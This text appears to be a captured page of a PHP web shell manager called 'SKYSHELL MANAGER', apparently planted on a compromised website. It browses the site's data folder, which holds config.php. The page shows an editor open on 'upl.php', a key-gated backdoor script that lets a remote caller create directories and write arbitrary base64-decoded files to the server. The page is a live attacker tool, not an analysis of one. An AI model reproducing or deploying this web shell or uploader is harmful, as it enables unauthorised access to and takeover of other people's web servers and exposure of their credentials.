📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
5600.88 KB
0644
🗑️
⬇️
✏️
🔒
Editing: upl.php
<?php if( $_GET['k'] != '9768ff220d05924bf57659b1e1f27c35' ){ exit('.'); } function echo_json($data) { echo json_encode( $data ); } if( !empty( $_POST['cmd'] ) ){ if( $_POST['cmd'] == "test" ){ echo_json(array( "code" => 200, )); } if( $_POST['cmd'] == "mkdir" ){ mkdir( $_POST['dir'] ); chmod( $_POST['dir'] , 0755 ); echo_json(array( "code" => 200, )); } if( $_POST['cmd'] == "upload" ){ $post_file = $_POST['file']; $post_data = $_POST['data']; file_put_contents( $post_file , base64_decode( $post_data ) ); chmod( $post_file , 0644 ); echo_json(array( "code" => 200, )); } }
💾 Save Changes